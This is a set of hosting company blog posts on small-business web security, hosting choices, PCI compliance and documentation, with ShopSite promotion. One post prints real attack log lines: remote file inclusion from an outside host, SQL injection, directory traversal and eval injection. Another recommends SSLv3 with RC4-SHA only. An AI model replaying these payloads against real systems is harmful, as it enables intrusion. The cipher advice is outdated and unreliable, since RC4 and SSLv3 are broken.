All our forward facing servers were patched and TLS1.0 disabled as per PCI compliance guidelines.

As always you can put your Trust in DNI to provide you fast response to your PCI Compliancy issues.

The next time I get a phone call to go over hacker clean up, server hardening, server administration where the prospective customer is more concerned over the $100.00 per hour rate than the problem costing them customers and potentially their business, I hope remember to share with them this article.

Imagine reading Service Suspension – Ongoing unanswered abuse complaints thinking to yourself, the person is in a jamb…. I hope they get someone who can really help them (maybe we could, not sure), then later on reading the person who initiated the post also runs a “All you can Eat” (i.e. unlimited support tickets, unlimited labor time) server administration business where they advertise a long list of what they can do for you for just $15.00 per month. I guess, they are so packed with work they could not solve their own problems.

Imagine, for just $15.00 per month you “24/7/365 USA-Based Technical Support” plus “24/7/365 Server Monitoring (5 Minute Intervals)” of your servers plus “Guaranteed 15 Minute Response On Monitoring Alerts” and so much more… sounds like a great deal? Right?

Now, I’m sure if you did a study of people who have heard and even believe in the quote, “you get what you pay for,” or variations of it, the percentage would be high.

Yet, how many actually do their homework to determine if something is really to good to be true?

For example, would you know right away that $15.00 per month for 24×7 coverage 365 days per year with a guaranteed response time of 15-minutes and unlimited administrator work (i.e. unlimited hours of work per month) was a deal too good to be true?

What if they removed the word, “unlimited,” and only included one hour per month? Would it then be more realistic?

In order to answer that question, what’s the going hourly rate for a server administrator? For a security administrator?

In the United States, for a server administrator, the going hourly rate ranges from $30.00 per hour to $52.00 per hour; for security administrators, the hourly rate ranges from $38.00 per hour to $56.00 per hour. In both cases, that doesn’t include benefits.

If a company is saying you get just even one hour for $15.00 when the going rate for an experienced party is $30.00 to $38.00 at a minimum….. get the picture?

You might get marketing speak that the employees multi-task and can work on many tasks at the same time… but isn’t that like someone who worked 2,000 real hours putting down 6,000 billable hours?

What are your thoughts on this subject? Did you purchase time thinking the rate was good or even average only to find out you were taken in by a “too good to be true” event? Let us know your thoughts below.

That’s right, everyone is a potential target — not just the big names, not just the rich companies, etc.

Now, web-based hack attempts come in many forms ranging from brute force to SQL injections.

Here’s a list of the common types including links to their definitions:

• Brute Force Attack
• Cross Site Scripting Attack
• Directory Traversal Attack
• Local file inclusion
• Remote file inclusion
• SQL Injection attack

I would like to share with you what each of the above types looks like from a log file or security report perspective.

The following comes from our proactive security monitoring service as well the reports we receive from our global security service.

I’m going to start off with the most common type we see which is remote file inclusion:

184.107.145.18 - - [06/Sep/2012:01:13:27 -0400] "GET /packages//wp-content/themes/metamorphosis/functions/thumb.php?src=http://www.blogger.com.moulinsaeau-41.org/cache.php HTTP/1.1" 404 3612 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2)

The above is timthumb attack where the attacker believes the Metamorphosis theme for WordPress if vulnerable; and they are trying to include the code from http://www.blogger.com.moulinsaeau-41.org/cache.php through the potential vulnerability.

The next type is an SQL injection attack:

84.235.73.226 - - [09/Sep/2012:01:16:03 +0100] "GET /merchandise.php?id=-999.9%20UNION%20ALL%20SELECT%20(SELECT%20distinct%20concat(0x7e,0x27,Hex(cast(table_name%20as%20char)),0x27,0x7e)%20FROM%20information_schema.tables%20Where%20table_schema=0x6A6F686E73746F6E5F6965%20limit%200,1),2,3,4,5-- HTTP/1.1" 500 3506 "-" "-" UEvfw1Qz7pgAAGfUdE0 "-"

The next is a directory traversal attack:

195.157.13.221 - - [05/Sep/2012:21:28:20 +0100] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00 HTTP/1.1" 500 3506 "-" "-" UEe15FQz7pAAABD2KuM "-"

What follows is an example of a local file inclusion:

190.90.209.251 - - [05/Sep/2012:18:13:46 +0100] "GET /phpMyAdmin//config/config.inc.php?eval=echo%20md5(123); HTTP/1.1" 500 3506 "-" "-" UEeISlWFNc8AABl2Nvw "-"

Below are two examples of brute force — one for SSH, the other for email:

sshd[21192]: Invalid user deploy from 64.185.229.239
vpopmail[7134]: vchkpw-pop3: vpopmail user not found webmaster@:88.43.116.246

Do you review your hosting log files on a regular basis to see what attacks are getting through or being blocked?

Is your provider doing this for you?

Please let us know your questions and thoughts in the comments below.

I also hear the variations of the above that often come in the form of, “my _______ told me I needed a dedicated server; what do you think?”

Let me share with you some thoughts and guidelines which will hopefully help you, if you are in the position of asking this question for your organization.

Oh, before I forget, let’s do some simple house keeping first.

1. Shared hosting is where one to many sites from different customers are hosted in the same environment (which in today’s age, could be in the cloud, one or more dedicated servers, or even one or more virtual machines). This environment is very similar to an apartment complex or condo where a number of resources are shared among the consumers.
2. VPS or virtual private server is where a slice of a cloud or dedicated server is provisioned for use by one customer.
3. Dedicated is where one to many physical servers are provisioned for use by one customer.
4. Cloud is where customers can provision off the exact resources they need within the scope of the provider; and modify what they need on demand (or close enough).

While stability in the cloud continues to improve, most of this article is going to be dedicated to the 1st three of the above as most of our customer base are businesses where stability and reliability matter more than being on the cutting edge of technology.

Let me walk you through some what if statements that generally lead to the type of hosting you will need.

What if I know exactly what resources — RAM, hard drive space, CPU power, bandwidth, etc. — I need, and I love to micromanage (I’ll be sure to check x times per y period if I need to add or reduce specific resources)? Well, then your best bet would be Cloud hosting where you decide what you need, pay for only what you use, and you have the ability to spend your time micromanaging the solution.

What if I know the specific server (i.e. web server, email server, database server, etc. — which is very different from end user applications such as WordPress, Joomla, or Drupal) software I want to run, and I want to have version control of the server software? Then you are looking at Cloud, Dedicated, or VPS.

What if I want to manage my own hosting environment? Then you are looking at Cloud, Dedicated, or VPS.

Ok, I’m a developer (or my developer shared) and I’m ok with shared hosting, but I know in advance my custom (often site-based) application(s) will require 30 or more simultaneous mySQL connections, at least 256 MB of dedicated RAM, and 50+ simultaneous Apache clients per second. What do I need? Chances are high you are looking at Cloud, Dedicated, or VPS. The more the RAM, mysql connections, and processes (overall, not just Apache), the higher the probability you would need Cloud or Dedicated.

What if I have a brand new site? Then shared hosting will probably fit you for a period of time.

What if I will be running stock site-based software such as WordPress, Drupal, and Joomla? Then shared hosting will most likely fit you.

What are the pros and cons of each type of hosting?

Cloud, Dedicated, and VPS — unless specifically provided as a managed service (and then you need to ask what is being managed?) — puts you in control of the hosting environment. You and your team are the security administrator, the server administrator, and the general house keeper.

The pro for Cloud, Dedicated, and VPS is sharing is limited (for Cloud and VPS there is still sharing of the physical hardware involved to a degree) to non exist (dedicated, it is all yours). You often get to run the operating system and version of your choice, the web server and version of your choice, the database server and version of your choice, and so on.

Shared hosting often comes with management; and if you are with solid company between a hosting automation system and their support, your hands are held through the years.

The con for shared hosting is that if you have special needs for the server-based software, you are at the mercy of whether the provider can meet those needs without impacting their other customers or not. In the latter case, you often have the choice to upgrade to a VPS, Dedicated, or Cloud; and most providers who offer multiple types of hosting will provide free migrations from one of their platforms to another (just be sure to ask rather than assume).

What about you?

What has your experience been in terms of finding out the type of hosting you need?

What type of hosting are you using now? Why did you pick that type of hosting?

Please use the comments to let us know.

Thank you.

This past weekend, I found out that some authorized PCI Compliance Scanning vendors will only grant you PCI Compliance status if your SSL Beast protection setup only allows for RC4-SHA and nothing else.

If you have such a vendor, then the following are the settings you would use in your Apache 2 httpd.conf configuration file:

SSLProtocol -ALL +SSLv3 +TLSv1
SSLCipherSuite RC4-SHA:HIGH:!ADH:!AES256-SHA:!ECDHE-RSA-AES256-SHA384:!AES128-SHA:!DES-CBC3-SHA:!DES-CBC3-MD5:!IDEA-CBC-SHA:!RC4-MD5:!IDEA-CBC-MD5:!RC2-CBC-MD5:!MD5:!aNULL:!EDH:!AESGCM
SSLHonorCipherOrder on                      

You can test your settings by running the following (preferably on another server):

openssl s_client -connect [ssl public machine]:443 -cipher RC4-SHA
openssl s_client -connect [ssl public machine name]:443 -cipher DES-CBC3-SHA
openssl s_client -connect [ssl public machine name]:443 -cipher AES256-SHA

And so on for the various ciphers; only the RC4-SHA should connect.

If you know of a more elegant way to adjust the SSLCipherSuite to only allow RC4-SHA please let us know using the comment form below.

I’m hoping to encourage you to review the documentation standards you have set forth for your small business; and potentially to do an in-house audit to ensure critical areas are covered.

In late August 2012, we received a call from the CEO of a small business whose web development person left their employment. They found out about our server administration services from SoftLayer as we are a SoftLayer certified partner.

They needed to update their web site for which they did not have the FTP login credentials; and they needed to generate a CSR (Certificate signing request) in order to renew the secure certificate for their web site so that https would continue to work.

Together, we hoped that given the server login credentials (which they did have on hand) that we could locate the FTP user, reset the FTP user password, and test FTP access with that information; and then use the server-based tools to generate the CSR for the secure certificate, and install it when they received it from the digital ID provider.

To keep the story short without going into the server administration details, the information they had on file was for a Citrix XenServer which was running multiple virtual machines. The web site for which they needed the FTP reset and a CSR generated was on one of the virtual machines.

There was no documentation as to which virtual machine other than a public IP address of the web site.

The non virtual equivalent is that you are given the keys to a safe. You open the safe and find several other safes within; and while you might be able to guess which safe is the right one within the safe, you don’t have the means to open it.

SoftLayer, whose extremely well automated portal, provided one of several means available to document the server environment; but notes were not put into the notes area for which private IP address belonged to which virtual machine which may also have helped.

While we were able to narrow down which virtual machine (aka safe) was most likely the correct one, ssh (remote access) appeared to be filtered by IP address… and you needed to access the virtual machine in order to tell it which IP addresses to allow.

The bottom line for this small business is potentially rebuilding everything from the ground up for costs in the double digit thousands of dollars (if not more).

• Employee handbook – ensuring it covers documentation expectations and requirements.
• Web site(s) – login credentials for every application, control panel, FTP, email, statistics / analytics along with daily, weekly, biweekly, monthly, etc. processes and procedures along with application names, versions, etc.
• Server(s) – specifications, login credentials, public IP, private IP. If there are virtual machines, the same — do you know where your servers are located? Names and contact information of responsible parties having what responsibilities?
• Change log – what installations, deletions, changes have been taking place — date, time, where, what, who, why, how, notes, etc?
• Contact information – name, company, mailing address, physical address, phone numbers, email, and when or why would they be contacted.
• Other? — What’s necessary for someone to take over your responsibilities if you are the last one standing, and need to pass on the baton?

As you do the audit, ask yourself (and hopefully check your thought process with trusted other parties) — if the responsible person for jobs a, b, and c were inaccessible tomorrow, would someone be able to take over quickly just based on the documentation that we have in place?

If the answer is “no,” then a level of priority should be given to making sure there is enough documentation (that is reviewed and tested for quality assurance) so the processes, procedures, tasks, and related responsibilities can be easily picked up by a new party.

Lastly, who knows where the documentation is located, and how to use the documentation?

Have you run into any nightmares in your business that proper documentation beforehand could have prevented or made less costly? Please share in the comments below.

Melinda, who hosts the Small Business Chat on twitter every Wednesday night from 8 PM to 9 PM Eastern Time, focuses on helping people become entrepreneurs and for the small businesses they create to grow and succeed.

Whether you have been in business for many years, or are just starting up… did you know that if you properly plan and prepare for your ecommerce store you greatly increase your opportunity to succeed?

If you are nodding your head, do you know how many business managers just leave this decision to their “Web” person or “IT” person?

Over the past 17 years in business, we’ve seen, read, or heard about the above two issues so often, we’ve lost count.

As you take ownership and responsibility of the decision for picking a shopping cart / ecommerce system, I encourage you to ask the following questions:

1. Is the ecommerce system PCI DSS certified (if the answer is no, attaining payment card industry (PCI) compliance runs from impossible to expensive)?
2. When was the last security bug (problem, issue, report, etc.) filed for the system on Secunia’s Vulnerability Database?
3. How many times per year is there a security bug reported over the last 15 years (the more frequently published, the higher degree there are unreported security bugs)?
4. How long has the ecommerce company that created the ecommerce system been in business (unfortunately a lot of business five years old or less fail)?
5. Does the ecommerce shopping cart provider list certified technology partners that can assist you if you run into problems using the system?
6. Is the ecommerce system fully portable should you need to move to a different hosting provider?
7. Will the ecommerce system work on the smallest of shared hosting plans?
8. How well does the shopping cart system scale? How long can you stay in a shared hosting environment to keep your monthly hosting investment to a minimum?

While you do need to trust the people with whom you are working, if you are the steward / manager of the business, the buck stops with you; and, I would encourage you to double check against any bias which may cost you your business.

I would like to share with you why you should consider ShopSite from ShopSite.com as the only ecommerce shopping cart you will need.

ShopSite is VISA PA DSS Certified. Since 1998 (when we started using and offering ShopSite as a ShopSite certified technology partner), any customer of ours using ShopSite who has a PCI Compliance Scan has ShopSite passing with flying colors.

In all of the years ShopSite has been available, they’ve only had one (1) security issue back in 1996. Compared to any other cart, that is outright amazing!!!

ShopSite has been in business for almost two decades. Very few other companies compare.

ShopSite has certified designers and certified technology / hosting partners. Dynamic Net is a certified technology / hosting partner; and we maintain relationships with certified ShopSite designers.

ShopSite is extremely portable especially if you purchase the license vs. renting (it is still portable with renting; but you want to assure that with the hosing provider from whom you rent the software prior to renting it — for us, it is 100% portable).

ShopSite is extremely fast (it is compiled code vs. interpreted PHP, Perl CGI, etc.); and ShopSite scales extremely well in a shared hosting environment.

ShopSite ecommerce stores have handled massive floods of traffic when the business is featured on national media in a shared hosting environment.

ShopSite is relatively web server agnostic; you don’t have to worry about a down ecommerce store because your hosting provider updated the operating system, the web server software, or the database software.

Please contact us if you have questions as to why ShopSite would be the only ecommerce system / shopping cart software your small to medium business will ever need.

Please share your thoughts and questions about this article below in the comment area.

Yet if you are the steward of any size business, fiduciary should be an active word in how you manage your business.

How does this relate to trust, security, and your business on the Internet? Let’s see.

In the recent past I’ve been involved in conversations with stewards of small businesses where the conversation went as follows.

Case 1:

Small business owner poses a problem in WordPress on their site in the LinkedIn WordPress Group.

One of the WordPress developers sends the small business owner a private message stating they would be happy to help fix the problem.

Small business owner sends over WordPress login credentials for his site; and shares on LinkedIn what’s going on.

I share with the owner they should change their WordPress login credentials once things are fixed.

Small business owner replies, “I trust ________; they’ve helped me in the past.”

What do you think is the Fiduciary responsibility of the owner?

Case 2:

Small business owner posts on Google+ concerning a tool that was shared with him by a “trusted” friend that checks if the LinkedIn password has been cracked.

I share the best practice is to avoid such tools altogether, to go directly to LinkedIn’s site and change the password directly with Linked In.

There are many reasons from the security of the site hosting the tool, who has access to the tool’s log files, the server’s log files, and what data the site is collecting from cookies and data entered.

The owner replied they trust the person who told them about the tool; and no one should ever question that person or the trust relationship.

What do you think is the Fiduciary responsibility of the owner?

I’ve worked for small to medium businesses over the past 30 some years.

I still remember working for my first medium business — American Equipment Leasing — when I was shocked to see the exit process of my manager (that was my first experience with best practice for when an employee is no longer an employee).

At the time I thought it was harsh that my boss was escorted to his desk, closely monitored while packing his personal belongings, escorted out, and in the mean time the information technology (IT) department given orders to make sure all access and clearance points were terminated.

I used to frown at the phrase, “it’s not personal, it’s business.” I would think to myself, it is personal? And in some cases, how personal can it get?

Yet, the bottom line is best practice doesn’t take into account feelings. Best practice takes into account doing what is right period.

It is not about trusting someone or not trusting someone. It is about taking 100% fiduciary responsibility for the task at hand.

Welcome back! Last week’s article, There are no wallflowers at the security dance! Get to know your dance partners covered getting to know your security dance partners:

If you are the business steward or a part of the management team, you already know the burden of responsibility for having a secure web site where your reputation, customers, sales, and business can be won or lost due to a defacement or other forms of security breaches.

While it is easy to say, “my web person handles that for me” or “I outsource it to so and so,” that does not mitigate the risk or otherwise make your life any easier if what you believe was going on, was not taking place.

Below is a check list you can use to help you take charge, and be the boss in the area of site security:

Verify that each dance partner is on the same page with you; and that they are doing their job.

You are the boss, and there will be times the partners need to be educated to pickup the pace, do their job, or be replaced.

In case you are wondering where we find in, here’s how the check list above looks for Dynamic Net, Inc.:

The overwhelming majority of our customers are small businesses who want peace of mind in knowing their hosting provider and the data centers used by their hosting provider are doing their job.

If you are not 100% happy that your hosting provider and their data center is doing their job in keeping your web site secure and safe, then contact us. We will be happy to talk with you or have an email conversation with you.

If you have your business on the Internet, you are a part of a line dance.

You can chose to be a wallflower, and face the consequences of doing nothing.

Or you can get to know your fellow dance partners (maybe picking replacements for ones that no longer fit), and be an active member of the security dance.

I have the privilege of communicating with small business stewards on an almost daily basis.

Some of the common things I read and hear concerning security are as follows:

• Don’t hackers just go after big companies?
• There’s nothing special about my web site that hackers would want.
• My hosting provider handles all of the security.

Unfortunately, all of the above statements have the business steward and their team being wallflowers rather than active participants in a perpetual dance that only ends when they stop having their business on the Internet.

Now, you might be ok being a wallflower at a social dance. Maybe you just go to sit and watch the other people dance. Maybe you just go for the music and the food. For a social dance, there’s little impact.

The impact for being a wallflower with a business on the Internet can lead to poor reputation, lost customers, lost income, and having to spend a lot of time to fix one or more situations that could have been prevented.

What does that mean?

While targeted hacking exists, the majority of hacking deals with vulnerabilities. Think of it like a gang going through the parking lot to see who was apathetic enough to leave their vehicle unlocked or that plus the keys still in the car.

This makes every single resource — web site, email, DNS, servers, routers, etc. — a target for hackers.

Now, let’s get back to dancing. I’m talking about old fashion slow dancing where you and your dance partner are close, hold hands, and watch out for one another on the dance floor.

Let’s relate that to a security dance, except rather than just two people dancing together, you have several in the form of a line dance.

Each dance partner needs to take as much responsibility in an active manner as they can to help and protect one another.

In this security dance, you have the following partners when you are looking specifically in the area of web hosting (including email, database and DNS):

• The business steward and their team.
• The web site designer and their team (if applicable — some small businesses do this in-house).
• The vendors of the applications installed by the above parties.
• The payment gateway(s) used by the above parties.
• The hosting provider.
• The data center(s) used by the hosting provider (if they don’t own their own; most do not).

Each dance partner plays a specific part in the dance; and, if the dance partner is not watching what they are doing, it will hurt more than having your foot stepped on, or falling off the ledge into a pool (like in It’s a Wonderful Life).

Now, let’s go over the responsibilities of each party in the security dance.

The data center should maintain SSAE 16 certification showing the data center management cares about quality assurance, processes, and procedures for maintaining quality.

The hosting provider should themselves have and maintain PCI Compliance. The hosting provider should also have each server secured (hardened against hackers) along with plans, policies, and procedures that keep the security up to date. The hosting provider should have plans, policies, and procedures in place to review server log files and reports throughout the day; and take appropriate action as necessary based on the daily review of those reports.

The payment gateway provider should have and maintain PCI Compliance, and have a history of taking security seriously including full disclosure of any past security breaches; and if there were any breaches, a written statement of what was done to prevent breaches of a similar nature from occurring in the future.

The application (content management systems like WordPress, Drupal, Joomla along with shopping carts etc) vendor is responsible for providing the business management team and their designer (in-house or external) with access to up to date software. They are responsible for writing secure code, and taking reports of vulnerable code seriously. Any vulnerability reports should be promptly handled by the application vendor development team providing patches and updates to their application in a timely manner.

The web site designer and their team (in-house or external) are responsible for applying application vendor provided updates and patches in a timely manner. This team should also be reviewing the site logs to see who is visiting the site, and how the site is being used.

The business steward — the buck stops here! — has the responsibility to check that each dance partner is doing their job.

In my next article, I plan to cover steps you can take as a business steward to make your life easier in being a part of this security dance; and in making sure your dance partners are dancing to the same tune for your benefit.

Please contact us if you have any questions.